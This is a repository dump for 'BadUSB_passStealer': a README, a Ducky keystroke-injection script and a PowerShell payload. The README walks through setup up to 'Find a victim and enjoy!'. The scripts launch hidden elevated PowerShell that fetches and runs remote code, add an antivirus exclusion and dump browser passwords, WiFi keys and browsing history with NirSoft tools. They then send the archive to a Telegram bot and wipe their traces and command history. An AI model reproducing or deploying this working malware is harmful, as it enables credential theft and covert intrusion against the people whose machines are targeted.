[
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2022 elliotYouKnow\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "README.md",
    "content": "# 💀 BadUSB_passStealer\n\n## ⚠️ Warning  \nEverything in this repository is **strictly** for educational purposes. **I am not responsible** for any stolen data. **You are responsible** for your actions when using this script for **BadUSB**.  \n\n## ℹ️ About  \nThis **script** allows you to steal the following **information**:  \n🔹 Browser **passwords** (Chrome, Firefox, Opera)  \n🔹 **WiFi** passwords  \n🔹 Browser **history** from the last 7 days  \n🔹 A **list** of all **devices** connected to the victim's network  \n\n## 🔑 Key Information for Users  \n\n### ⚠️ MalDuino & Rubber Ducky Users  \nYou **must** replace **`CTRL-SHIFT ENTER`** with **`CTRL SHIFT ENTER`** in the [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1) file.  \n\n✅ **Flipper Zero users**, no changes are needed—this syntax is already compatible.  \n\n### ⚠️ Arduino Users  \n🚫 I **stopped upgrading** `.ino` scripts. If you need them, you can **convert Ducky Scripts** [here](https://duckify.huhn.me/).  \n\n### 🕒 Adjusting Delay  \nYou can customize the **delays** based on the **speed** of the **target machine**.\n\n### ⏳ Waiting for Execution  \nWhen you plug the **BadUSB** into a PC, **wait for the Caps Lock to flash** before unplugging it.  \n\n---\n\n# 🚀 Getting Started  \n\n## 📌 Requirements  \n✔️ A **BadUSB**  \n✔️ Install **Arduino software** [here](https://www.arduino.cc/en/software) *(if using an Arduino-based BadUSB)*  \n✔️ A **Telegram account**  \n✔️ A **victim using Windows 10/11**  \n\n---\n\n# 🤖 Setting up a Telegram Bot for Uploading Files  \n\n## 1️⃣ Create a Telegram Bot  \n1️⃣ Open [Telegram Web](https://web.telegram.org/) and log in.  \n2️⃣ Search for **@BotFather** in the Telegram search bar.  \n3️⃣ Click **Start** to begin a conversation.  \n4️⃣ Send `/newbot`.  \n5️⃣ Choose a bot **name** and send it.  \n6️⃣ Choose a bot **username** and send it.  \n7️⃣ **@BotFather** will provide an API token:\n   > Done! Congratulations on your new bot. You will find it at t.me/BOT_USERNAME. You can now add a description, about section, and profile picture for your bot. See /help for a list of commands.\n   > Use this token to access the HTTP API:\n   > **API_ACCESS_TOKEN**\n   > For a description of the Bot API, see this page: https://core.telegram.org/bots/api\n\n8️⃣ Start a chat with your bot by clicking **t.me/BOT_USERNAME** and pressing **Start**.  \n\n## 2️⃣ Get Your Telegram API Token  \nYour **API token** is provided in **@BotFather**'s response.  \n\n## 3️⃣ Get Your Telegram Chat ID  \n1️⃣ Open your browser and replace `API_ACCESS_TOKEN` in this URL:  \n   ```\n   https://api.telegram.org/bot<API_ACCESS_TOKEN>/getUpdates?offset=0\n   ```\n2️⃣ Send a **test message** to your bot on Telegram.  \n3️⃣ Refresh the API page.  \n4️⃣ Find your **chat ID** in the response JSON. Example:  \n   ```\n   \"chat\":{\"id\":123456789,\"type\":\"private\"}\n   ```\n   Your chat ID is **123456789**.  \n\n---\n\n# ⚙️ Installation for Rubber Ducky, Malduino W, and Flipper Zero  \n\n1️⃣ **Download this repository**  \n\n   🔹 **Linux:**  \n   ```bash\n   git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer\n   cd BadUSB_passStealer\n   ```  \n\n   🔹 **Windows:**  \n   - Click the **green \"Code\" button** at the top right.  \n   - Click **\"Download ZIP\"** and extract it.  \n\n2️⃣ Replace **`<TOKEN>`** and **`<CHAT_ID>`** in [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1).  \n\n3️⃣ **Upload `ps.ps1` to get a downloadable link**.  \n\n4️⃣ Replace **`LINK`** in [`BadUSB_passStealer_upload.txt`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/BadUSB_passStealer_upload.txt) with the `ps.ps1` link.  \n\n5️⃣ Place the `.txt` file in your **BadUSB**.  \n\n6️⃣ **Find a victim and enjoy!** 🎭  \n\n---\n\n# 🛠️ NirSoft Tools  \n\n🔗 You can download NirSoft tools here:  \n\n🔹 **[WebBrowserPassView.exe](https://www.nirsoft.net/protected_downloads/passreccommandline.zip)** *(User: `download` | Password: `nirsoft123!`)*  \n🔹 **[WNetWatcher.exe](https://www.nirsoft.net/utils/wireless_network_watcher.html)**  \n🔹 **[BrowsingHistoryView.exe](https://www.nirsoft.net/utils/browsing_history_view.html)**  \n🔹 **[WirelessKeyView.exe](https://www.nirsoft.net/utils/wireless_key.html)**  \n"
  },
  {
    "path": "upload/BadUSB_passStealer_upload.txt",
    "content": "REM                      _                        \r\nREM  _   _  ___  _   _  | | ___ __   _____      __\r\nREM | | | |/ _ \\| | | | | |/ /  _ \\ / _ \\ \\ /\\ / /\r\nREM | |_| | (_) | |_| |_|   <| | | | (_) \\ V  V / \r\nREM  \\__, |\\___/ \\__,_(_)_|\\_\\_| |_|\\___/ \\_/\\_/  \r\nREM  |___/                                        \r\n\r\nREM ###########################################################\r\nREM #                                                         #\r\nREM # Title    : BadUSB_passStealer                           #\r\nREM # Author   : you.know                                     #\r\nREM # Version  : 2.0                                          #\r\nREM # Category : Data Exfiltration, Credential Dumping        #\r\nREM # Target   : Windows 10/11                                #\r\nREM #                                                         #\r\nREM # Description:                                            #\r\nREM # - Launches PowerShell in hidden mode                    #\r\nREM # - Extracts browser passwords and WiFi credentials       #\r\nREM # - Saves them as .txt files                              #\r\nREM # - Exfiltrates the data via Telegram                     #\r\nREM # - Cleans up traces after execution                      #\r\nREM #                                                         #\r\nREM ###########################################################\r\n\r\nREM Initial delay to ensure the system is ready\r\nDELAY 2500\r\n\r\nREM Minimize all active windows\r\nGUI d\r\nDELAY 500\r\n\r\nREM Open Run dialog\r\nGUI r\r\nDELAY 500\r\n\r\nREM Execute PowerShell hidden with administrative privileges\r\nSTRING powershell -w h -NoP -Ep Bypass -Command \"irm <LINK> | iex\"\r\nCTRL-SHIFT ENTER\r\nDELAY 1000\r\nLEFT\r\nDELAY 500\r\nENTER\r\n\r\nREM Flash CAPSLOCK as an indicator that execution is complete\r\nCAPSLOCK\r\nDELAY 500\r\nCAPSLOCK\r\nDELAY 500\r\nCAPSLOCK\r\nDELAY 500\r\nCAPSLOCK\r\n"
  },
  {
    "path": "upload/ps.ps1",
    "content": "#                      _                        \r\n#  _   _  ___  _   _  | | ___ __   _____      __\r\n# | | | |/ _ \\| | | | | |/ /  _ \\ / _ \\ \\ /\\ / /\r\n# | |_| | (_) | |_| |_|   <| | | | (_) \\ V  V / \r\n#  \\__, |\\___/ \\__,_(_)_|\\_\\_| |_|\\___/ \\_/\\_/  \r\n#  |___/                                        \r\n\r\n$basePath = \"C:\\Users\\Public\\Documents\\scripts\"\r\n$dumpFolder = \"$basePath\\$env:USERNAME-$(get-date -f yyyy-MM-dd)\"\r\n$dumpFile = \"$dumpFolder.zip\"\r\n\r\n# Create directory\r\nNew-Item -ItemType Directory -Path $basePath -Force | Out-Null\r\nSet-Location $basePath\r\nNew-Item -ItemType Directory -Path $dumpFolder -Force | Out-Null\r\nAdd-MpPreference -ExclusionPath $basePath -Force\r\n\r\n# Download necessary tools\r\nInvoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WirelessKeyView.exe?raw=true -OutFile WirelessKeyView.exe\r\nInvoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true -OutFile WebBrowserPassView.exe\r\nInvoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/BrowsingHistoryView.exe?raw=true -OutFile BrowsingHistoryView.exe\r\nInvoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WNetWatcher.exe?raw=true -OutFile WNetWatcher.exe\r\n\r\n\r\n# Execute tools to gather data\r\n.\\WNetWatcher.exe /stext connected_devices.txt\r\n.\\BrowsingHistoryView.exe /VisitTimeFilterType 3 7 /stext history.txt\r\n.\\WebBrowserPassView.exe /stext passwords.txt\r\n.\\WirelessKeyView.exe /stext wifi.txt\r\n\r\n# Wait for the files to be fully written\r\nwhile (!(Test-Path \"passwords.txt\") -or !(Test-Path \"wifi.txt\") -or !(Test-Path \"connected_devices.txt\") -or !(Test-Path \"history.txt\")) {\r\n    Start-Sleep -Seconds 1\r\n}\r\n\r\nMove-Item passwords.txt, wifi.txt, connected_devices.txt, history.txt -Destination \"$dumpFolder\"\r\n\r\n# Compress extracted data\r\nCompress-Archive -Path \"$dumpFolder\\*\" -DestinationPath \"$dumpFile\" -Force\r\n\r\n# Wait until the ZIP file is created\r\nwhile (!(Test-Path \"$dumpFile\")) {\r\n    Start-Sleep -Seconds 1\r\n}\r\n\r\n# Telegram configuration\r\n$token = \"<TOKEN>\"\r\n$chatID = \"<CHATID>\"\r\n$uri = \"https://api.telegram.org/bot$token/sendDocument\"\r\n$caption = \"Here are exfiltrated informations from $env:USERNAME\"\r\n\r\n# Check if the file exists before sending\r\nif (!(Test-Path $dumpFile)) {\r\n    exit 1\r\n}\r\n\r\n# Ensure System.Net.Http is available\r\nif (-not (\"System.Net.Http.HttpClient\" -as [type])) {\r\n    $httpPath = Get-ChildItem -Path \"C:\\Windows\\Microsoft.NET\\Framework64\\\" -Recurse -Filter \"System.Net.Http.dll\" | Select-Object -First 1 -ExpandProperty FullName\r\n    if ($httpPath) {\r\n        Add-Type -Path $httpPath\r\n    } else {\r\n        exit 1\r\n    }\r\n}\r\n\r\n# Create HTTP client\r\n$client = New-Object System.Net.Http.HttpClient\r\n$content = New-Object System.Net.Http.MultipartFormDataContent\r\n$content.Add((New-Object System.Net.Http.StringContent($chatID)), \"chat_id\")\r\n$content.Add((New-Object System.Net.Http.StringContent($caption)), \"caption\")\r\n\r\n# Attach the ZIP file\r\n$filename = [System.IO.Path]::GetFileName(\"$dumpFile\")\r\n$fileStream = [System.IO.File]::OpenRead(\"$dumpFile\")\r\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream)\r\n$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse(\"application/octet-stream\")\r\n$content.Add($fileContent, \"document\", $filename)\r\n\r\n# Send data to Telegram\r\ntry {\r\n    $client.PostAsync($uri, $content).Wait()\r\n} catch {}\r\n\r\n# Cleanup\r\n$fileStream.Close()\r\n$fileStream.Dispose()\r\n\r\nSet-Location C:\\Users\\Public\\Documents\r\nRemove-Item -Recurse -Force scripts\r\nRemove-MpPreference -ExclusionPath \"C:\\Users\\Public\\Documents\\scripts\" -Force\r\n\r\n# Caps Lock signal\r\n$keyBoardObject = New-Object -ComObject WScript.Shell\r\nfor ($i=0; $i -lt 4; $i++) {\r\n    $keyBoardObject.SendKeys(\"{CAPSLOCK}\")\r\n    Start-Sleep -Seconds 1\r\n}\r\n\r\n# Clear command history\r\nClear-Content (Get-PSReadlineOption).HistorySavePath\r\n\r\nexit\r\n"
  }
]